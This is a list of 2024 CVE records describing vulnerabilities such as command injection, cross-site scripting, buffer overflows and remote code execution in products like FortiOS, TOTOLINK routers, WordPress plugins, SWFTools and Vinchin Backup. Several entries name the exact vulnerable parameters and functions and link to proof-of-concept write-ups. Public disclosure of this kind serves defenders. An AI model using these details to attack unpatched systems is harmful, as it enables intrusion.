CVE    2024    23122    Candidate    A maliciously crafted 3DM file in opennurbs.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23121    Candidate    A maliciously crafted MODEL file in libodxdll.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.    MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0002   |   MISC:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004   |   URL:https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0004    Assigned (20240111)
CVE    2024    23114    Candidate    Deserialization of Untrusted Data vulnerability in Apache Camel CassandraQL Component AggregationRepository which is vulnerable to unsafe deserialization. Under specific conditions it is possible to deserialize malicious payload. This issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0. Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1    MISC:https://camel.apache.org/security/CVE-2024-23114.html   |   URL:https://camel.apache.org/security/CVE-2024-23114.html    Assigned (20240111)
CVE    2024    23113    Candidate    A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized code or commands via specially crafted packets.    MISC:https://fortiguard.com/psirt/FG-IR-24-029   |   URL:https://fortiguard.com/psirt/FG-IR-24-029    Assigned (20240111)
CVE    2024    23112    Candidate    An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiOS version 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.1 through 7.0.13, 6.4.7 through 6.4.14, and FortiProxy version 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14 SSL-VPN may allow an authenticated attacker to gain access to another user’s bookmark via URL manipulation.    MISC:https://fortiguard.com/psirt/FG-IR-24-013   |   URL:https://fortiguard.com/psirt/FG-IR-24-013    Assigned (20240111)
CVE    2024    23109    Candidate    An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via crafted API requests.    MISC:https://fortiguard.com/psirt/FG-IR-23-130   |   URL:https://fortiguard.com/psirt/FG-IR-23-130    Assigned (20240111)
CVE    2024    23094    Candidate    Flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /cover/addons/info_media_gallery/action/edit_addon_post.php    MISC:https://github.com/TinkAnet/cve/blob/main/csrf3.md    Assigned (20240111)
CVE    2024    2308    Candidate    The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link in the EliSlider in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050556%40elementinvader-addons-for-elementor&new=3050556%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050556%40elementinvader-addons-for-elementor&new=3050556%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/40a272dc-cb2a-472f-be42-733efcb2fa61?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/40a272dc-cb2a-472f-be42-733efcb2fa61?source=cve    Assigned (20240307)
CVE    2024    2307    Candidate    A flaw was found in osbuild-composer. A condition can be triggered that disables GPG verification for package repositories, which can expose the build phase to a Man-in-the-Middle attack, allowing untrusted code to be installed into an image being built.    MISC:RHBZ#2268513   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2268513   |   MISC:https://access.redhat.com/security/cve/CVE-2024-2307   |   URL:https://access.redhat.com/security/cve/CVE-2024-2307    Assigned (20240307)
CVE    2024    23061    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the minute parameter in the setScheduleCfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/3/TOTOLINK%20A3300R%20setScheduleCfg.md    Assigned (20240111)
CVE    2024    23060    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the ip parameter in the setDmzCfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/4/TOTOLINK%20A3300R%20setDmzCfg.md    Assigned (20240111)
CVE    2024    23059    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the username parameter in the setDdnsCfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/2/TOTOlink%20A3300R%20setDdnsCfg.md    Assigned (20240111)
CVE    2024    23058    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the pass parameter in the setTr069Cfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/6/TOTOlink%20A3300R%20setTr069Cfg.md    Assigned (20240111)
CVE    2024    23057    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the tz parameter in the setNtpCfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/5/TOTOlink%20A3300R%20setNtpCfg.md    Assigned (20240111)
CVE    2024    23055    Candidate    An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers.    MISC:http://plone.com   |   MISC:http://ploneorg.com   |   MISC:https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-23055    Assigned (20240111)
CVE    2024    23054    Candidate    An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution due to a package listed in ++plone++static/components not existing in the public package index (npm).    MISC:http://plone.com   |   MISC:http://ploneorg.com   |   MISC:https://github.com/c0d3x27/CVEs/blob/main/CVE-2024-23054/README.md    Assigned (20240111)
CVE    2024    23052    Candidate    An issue in WuKongOpenSource WukongCRM v.72crm_9.0.1_20191202 allows a remote attacker to execute arbitrary code via the parseObject() function in the fastjson component.    MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/WukongCRM_9.0.md#1remote-code-execution-vulnerability   |   MISC:https://github.com/WuKongOpenSource/WukongCRM-9.0-JAVA/issues/28    Assigned (20240111)
CVE    2024    23049    Candidate    An issue in symphony v.3.6.3 and before allows a remote attacker to execute arbitrary code via the log4j component.    MISC:https://github.com/88250/symphony/issues/82    Assigned (20240111)
CVE    2024    2304    Candidate    The Animated Headline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animated-headline' shortcode in all versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://wordpress.org/plugins/animated-headline/   |   URL:https://wordpress.org/plugins/animated-headline/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f589b5d-9cdb-4521-bc60-c8f19d0ef982?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6f589b5d-9cdb-4521-bc60-c8f19d0ef982?source=cve    Assigned (20240307)
CVE    2024    23034    Candidate    Cross Site Scripting vulnerability in the input parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.    MISC:https://github.com/weng-xianhu/eyoucms/issues/57    Assigned (20240111)
CVE    2024    23033    Candidate    Cross Site Scripting vulnerability in the path parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.    MISC:https://github.com/weng-xianhu/eyoucms/issues/57    Assigned (20240111)
CVE    2024    23032    Candidate    Cross Site Scripting vulnerability in num parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.    MISC:https://github.com/weng-xianhu/eyoucms/issues/57    Assigned (20240111)
CVE    2024    23031    Candidate    Cross Site Scripting (XSS) vulnerability in is_water parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.    MISC:https://github.com/weng-xianhu/eyoucms/issues/57    Assigned (20240111)
CVE    2024    2303    Candidate    The Easy Textillate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'textillate' shortcode in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050231%40easy-textillate&new=3050231%40easy-textillate&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050231%40easy-textillate&new=3050231%40easy-textillate&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/66529116-7b0e-4e2f-96f1-a4d91fa7f956?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/66529116-7b0e-4e2f-96f1-a4d91fa7f956?source=cve    Assigned (20240307)
CVE    2024    22988    Candidate    An issue in zkteco zkbio WDMS v.8.0.5 allows an attacker to execute arbitrary code via the /files/backup/ component.    MISC:https://gist.github.com/whiteman007/b50a9b64007a5d7bcb7a8bee61d2cb47   |   MISC:https://www.vicarius.io/vsociety/posts/revealing-cve-2024-22988-a-unique-dive-into-exploiting-access-control-gaps-in-zkbio-wdms-uncover-the-untold-crafted-for-beginners-with-a-rare-glimpse-into-pentesting-strategies   |   MISC:https://zkteco.com    Assigned (20240111)
CVE    2024    22984    Candidate    ** REJECT ** DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.        Assigned (20240111)
CVE    2024    22983    Candidate    SQL injection vulnerability in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via the name parameter in the myform.php endpoint.    MISC:http://projectworlds.com   |   MISC:http://visitor.com   |   MISC:https://github.com/keru6k/CVE-2024-22983/blob/main/CVE-2024-22983.md    Assigned (20240111)
CVE    2024    2298    Candidate    The affiliate-toolkit – WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_import_product() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized actions such as creating importing products.    MISC:https://plugins.trac.wordpress.org/changeset/3045821/affiliate-toolkit-starter/trunk/includes/atkp_endpoints.php   |   URL:https://plugins.trac.wordpress.org/changeset/3045821/affiliate-toolkit-starter/trunk/includes/atkp_endpoints.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d4d0176-3b7d-4de5-95ec-365873e6f13b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4d4d0176-3b7d-4de5-95ec-365873e6f13b?source=cve    Assigned (20240307)
CVE    2024    22957    Candidate    swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190.    MISC:https://github.com/matthiaskramm/swftools/issues/206    Assigned (20240111)
CVE    2024    22956    Candidate    swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838    MISC:https://github.com/matthiaskramm/swftools/issues/208    Assigned (20240111)
CVE    2024    22955    Candidate    swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576.    MISC:https://github.com/matthiaskramm/swftools/issues/207    Assigned (20240111)
CVE    2024    22942    Candidate    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the hostName parameter in the setWanCfg function.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/1/TOTOlink%20A3300R%20setWanCfg.md    Assigned (20240111)
CVE    2024    2294    Candidate    The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.7 via the backup_name parameter in the backuply_download_backup function. This makes it possible for attackers who have an account with only the activate_plugins capability to access arbitrary files on the server, which can contain sensitive information. This only impacts sites hosted on Windows servers.    MISC:https://plugins.trac.wordpress.org/browser/backuply/trunk/functions.php#L1615   |   URL:https://plugins.trac.wordpress.org/browser/backuply/trunk/functions.php#L1615   |   MISC:https://plugins.trac.wordpress.org/browser/backuply/trunk/main/ajax.php#L78   |   URL:https://plugins.trac.wordpress.org/browser/backuply/trunk/main/ajax.php#L78   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050547%40backuply&new=3050547%40backuply&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050547%40backuply&new=3050547%40backuply&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/be3bd1f2-092c-47c4-a4e4-3365e107c57f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/be3bd1f2-092c-47c4-a4e4-3365e107c57f?source=cve    Assigned (20240307)
CVE    2024    22939    Candidate    Cross Site Request Forgery vulnerability in FlyCms v.1.0 allows a remote attacker to execute arbitrary code via the system/article/category_edit component.    MISC:https://github.com/NUDTTAN91/CVE-2024-22939   |   MISC:https://github.com/NUDTTAN91/CVE20240109/blob/master/README.md    Assigned (20240111)
CVE    2024    22938    Candidate    Insecure Permissions vulnerability in BossCMS v.1.3.0 allows a local attacker to execute arbitrary code and escalate privileges via the init function in admin.class.php component.    MISC:https://github.com/n0Sleeper/bosscmsVuln   |   MISC:https://github.com/n0Sleeper/bosscmsVuln/issues/1   |   MISC:https://www.bosscms.net/    Assigned (20240111)
CVE    2024    22936    Candidate    Cross-site scripting (XSS) vulnerability in Parents & Student Portal in Genesis School Management Systems in Genesis AIMS Student Information Systems v.3053 allows remote attackers to inject arbitrary web script or HTML via the message parameter.    MISC:https://github.com/SnoopJesus420/CVEs/blob/main/CVE-2023-   |   MISC:https://github.com/SnoopJesus420/CVEs/blob/main/CVEs-2024/CVE-2024-22936.md    Assigned (20240111)
CVE    2024    2293    Candidate    The Site Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user display name in all versions up to, and including, 6.11.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/site-reviews/trunk/views/partials/listtable/filter.php#L5   |   URL:https://plugins.trac.wordpress.org/browser/site-reviews/trunk/views/partials/listtable/filter.php#L5   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=/site-reviews/tags/6.11.4&old=3049214&new_path=/site-reviews/tags/6.11.7&new=3049214&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=/site-reviews/tags/6.11.4&old=3049214&new_path=/site-reviews/tags/6.11.7&new=3049214&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/823418d9-a231-4306-8575-2937a491509f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/823418d9-a231-4306-8575-2937a491509f?source=cve    Assigned (20240307)
CVE    2024    22927    Candidate    Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.    MISC:https://github.com/weng-xianhu/eyoucms/issues/57    Assigned (20240111)
CVE    2024    22923    Candidate    SQL injection vulnerability in adv radius v.2.2.5 allows a local attacker to execute arbitrary code via a crafted script.    MISC:http://advradius.com/demo/   |   MISC:https://gist.github.com/whiteman007/    Assigned (20240111)
CVE    2024    22922    Candidate    An issue in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via a crafted script to the login page in the POST/index.php    MISC:http://projectworlds.com   |   MISC:http://visitor.com   |   MISC:https://github.com/keru6k/CVE-2024-22922/blob/main/CVE-2024-22922.md    Assigned (20240111)
CVE    2024    22920    Candidate    swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c.    MISC:https://github.com/matthiaskramm/swftools/issues/211    Assigned (20240111)
CVE    2024    22919    Candidate    swftools 0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587.    MISC:https://github.com/matthiaskramm/swftools/issues/209    Assigned (20240111)
CVE    2024    22917    Candidate    SQL injection vulnerability in Dynamic Lab Management System Project in PHP v.1.0 allows a remote attacker to execute arbitrary code via a crafted script.    MISC:https://github.com/ASR511-OO7/CVE-2024-22917/blob/main/CVE-22    Assigned (20240111)
CVE    2024    22916    Candidate    In D-LINK Go-RT-AC750 v101b03, the sprintf function in the sub_40E700 function within the cgibin is susceptible to stack overflow.    MISC:https://kee02p.github.io/2024/01/13/CVE-2024-22916/   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240111)
CVE    2024    22915    Candidate    A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution.    MISC:https://github.com/matthiaskramm/swftools/issues/215    Assigned (20240111)
CVE    2024    22914    Candidate    A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service.    MISC:https://github.com/matthiaskramm/swftools/issues/214    Assigned (20240111)
CVE    2024    22913    Candidate    A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution.    MISC:https://github.com/matthiaskramm/swftools/issues/213    Assigned (20240111)
CVE    2024    22912    Candidate    A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution.    MISC:https://github.com/matthiaskramm/swftools/issues/212    Assigned (20240111)
CVE    2024    22911    Candidate    A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602.    MISC:https://github.com/matthiaskramm/swftools/issues/216    Assigned (20240111)
CVE    2024    2291    Candidate    In Progress MOVEit Transfer versions released before 2022.0.11 (14.0.11), 2022.1.12 (14.1.12), 2023.0.9 (15.0.9), 2023.1.4 (15.1.4), a logging bypass vulnerability has been discovered. An authenticated user could manipulate a request to bypass the logging mechanism within the web application which results in user activity not being logged properly.    MISC:https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-March-2024   |   URL:https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-March-2024   |   MISC:https://www.progress.com/moveit   |   URL:https://www.progress.com/moveit    Assigned (20240307)
CVE    2024    22903    Candidate    Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the deleteUpdateAPK function.    MISC:http://vinchin.com   |   MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/   |   MISC:https://seclists.org/fulldisclosure/2024/Jan/32    Assigned (20240111)
CVE    2024    22902    Candidate    Vinchin Backup & Recovery v7.2 was discovered to be configured with default root credentials.    MISC:http://default.com   |   MISC:http://vinchin.com   |   MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/   |   MISC:https://seclists.org/fulldisclosure/2024/Jan/31    Assigned (20240111)
CVE    2024    22901    Candidate    Vinchin Backup & Recovery v7.2 was discovered to use default MYSQL credentials.    MISC:http://vinchin.com   |   MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/   |   MISC:https://seclists.org/fulldisclosure/2024/Jan/30    Assigned (20240111)
CVE    2024    22900    Candidate    Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the setNetworkCardInfo function.    MISC:http://vinchin.com   |   MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/   |   MISC:https://seclists.org/fulldisclosure/2024/Jan/29    Assigned (20240111)
CVE    2024    22899    Candidate    Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function.    MISC:http://vinchin.com   |   MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/   |   MISC:https://seclists.org/fulldisclosure/2024/Jan/29    Assigned (20240111)
CVE    2024    22895    Candidate    DedeCMS 5.7.112 has a File Upload vulnerability via uploads/dede/module_upload.php.    MISC:https://github.com/zzq66/cve5    Assigned (20240111)
CVE    2024    22894    Candidate    An issue fixed in AIT-Deutschland Alpha Innotec Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later and Novelan Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later, allows remote attackers to execute arbitrary code via the password component in the shadow file.    MISC:https://github.com/Jaarden/AlphaInnotec-Password-Vulnerability/   |   MISC:https://github.com/Jaarden/CVE-2024-22894    Assigned (20240111)
CVE    2024    22891    Candidate    Nteract v.0.28.0 was discovered to contain a remote code execution (RCE) vulnerability via the Markdown link.    MISC:https://github.com/EQSTLab/PoC/tree/main/2024/RCE/CVE-2024-22891    Assigned (20240111)
CVE    2024    22889    Candidate    Due to incorrect access control in Plone version v6.0.9, remote attackers can view and list all files hosted on the website via sending a crafted request.    MISC:https://github.com/shenhav12/CVE-2024-22889-Plone-v6.0.9    Assigned (20240111)
CVE    2024    22877    Candidate    StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened.    MISC:https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-001.md    Assigned (20240111)
CVE    2024    22876    Candidate    StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with JavaScript code that will be executed in the context of the TheHive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application, such as helping an analyst become an administrator.    MISC:https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-002.md    Assigned (20240111)
CVE    2024    22873    Candidate    Tencent Blueking CMDB v3.2.x to v3.9.x was discovered to contain a Server-Side Request Forgery (SSRF) via the event subscription function (/service/subscription.go). This vulnerability allows attackers to access internal requests via a crafted POST request.    MISC:http://blueking.com   |   MISC:http://tencent.com   |   MISC:https://gist.github.com/exp1orer/0f190c6a64b668a9b1c4c47789affa09   |   MISC:https://sphenoid-enquiry-9be.notion.site/BK-CMDB-SSRF-ba21e94f4976460188fa52d26c15a6ae?pvs=4    Assigned (20240111)
CVE    2024    22871    Candidate    An issue in Clojure versions 1.20 to 1.12.0-alpha5 allows an attacker to cause a denial of service (DoS) via the clojure.core$partial$fn__5920 function.    FEDORA:FEDORA-2024-270cd506bb   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YFPGUDXMW6OXKIDGCOZFEAXO74VQIB2T/   |   FEDORA:FEDORA-2024-91dab41dfa   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25FKUOYXQZGGJMFUM5HJABWMIX2TILRV/   |   FEDORA:FEDORA-2024-f7745a5990   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SWWK2SO2MH4SXPO6L444MM6LHVLVFULV/   |   MISC:https://hackmd.io/@fe1w0/rymmJGida    Assigned (20240111)
CVE    2024    22862    Candidate    Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the JPEG XL Parser.    MISC:https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=62113   |   MISC:https://github.com/FFmpeg/FFmpeg/commit/ca09d8a0dcd82e3128e62463231296aaf63ae6f7    Assigned (20240111)
CVE    2024    22861    Candidate    Integer overflow vulnerability in FFmpeg before n6.1, allows attackers to cause a denial of service (DoS) via the avcodec/osq module.    MISC:https://github.com/FFmpeg/FFmpeg/commit/87b8c1081959e45ffdcbabb3d53ac9882ef2b5ce    Assigned (20240111)
CVE    2024    22860    Candidate    Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder.    MISC:https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=61991   |   MISC:https://github.com/FFmpeg/FFmpeg/commit/d2e8974699a9e35cc1a926bf74a972300d629cd5    Assigned (20240111)
CVE    2024    2286    Candidate    The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link URL value in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047987%40sky-elementor-addons&new=3047987%40sky-elementor-addons&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047987%40sky-elementor-addons&new=3047987%40sky-elementor-addons&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d5d0ccbd-a091-4897-a100-eac75ffa0e3b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d5d0ccbd-a091-4897-a100-eac75ffa0e3b?source=cve    Assigned (20240307)
CVE    2024    22859    Candidate    ** DISPUTED ** Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code via the getCsrfToken function. NOTE: the vendor disputes this because the 5d88731 commit fixes a usability problem (HTTP 419 status codes for legitimate client activity), not a security problem.    MISC:https://github.com/github/advisory-database/pull/3490   |   MISC:https://github.com/livewire/livewire/commit/5d887316f2aaf83c0e380ac5e72766f19700fa3b    Assigned (20240111)
CVE    2024    22857    Candidate    zlog 1.2.16 has a heap-based buffer overflow in struct zlog_rule_s while creating a new rule that is already defined in the provided configuration file. A regular user can achieve arbitrary code execution.    MISC:https://github.com/HardySimpson/zlog/   |   MISC:https://github.com/HardySimpson/zlog/blob/1a7b1a6fb956b92a4079ccc91f30da21f34ca063/src/rule.h#L30   |   MISC:https://www.cybersecurity-help.cz/vdb/SB2024022842    Assigned (20240111)
CVE    2024    22854    Candidate    DOM-based HTML injection vulnerability in the main page of Darktrace Threat Visualizer version 6.1.27 (bundle version 61050) and before has been identified. A URL, crafted by a remote attacker and visited by an authenticated user, allows open redirect and potential credential stealing using an injected HTML form.    MISC:https://tomekwasiak.pl/cve-2024-22854/    Assigned (20240111)
CVE    2024    22853    Candidate    D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.    MISC:https://github.com/Beckaf/vunl/blob/main/D-Link/AC750/2/2.md   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240111)
CVE    2024    22852    Candidate    D-Link Go-RT-AC750 GORTAC750_A1_FW_v101b03 contains a stack-based buffer overflow via the function genacgi_main. This vulnerability allows attackers to enable telnet service via a specially crafted payload.    MISC:https://github.com/Beckaf/vunl/blob/main/D-Link/AC750/1/1.md   |   MISC:https://www.dlink.com/en/security-bulletin/    Assigned (20240111)
CVE    2024    22851    Candidate    Directory Traversal Vulnerability in LiveConfig before v.2.5.2 allows a remote attacker to obtain sensitive information via a crafted request to the /static/ endpoint.    CONFIRM:https://www.liveconfig.com/de/kb/cve/cve-2024-22851/   |   MISC:https://www.drive-byte.de/en/blog/liveconfig-advisory-cve-2024-22851    Assigned (20240111)
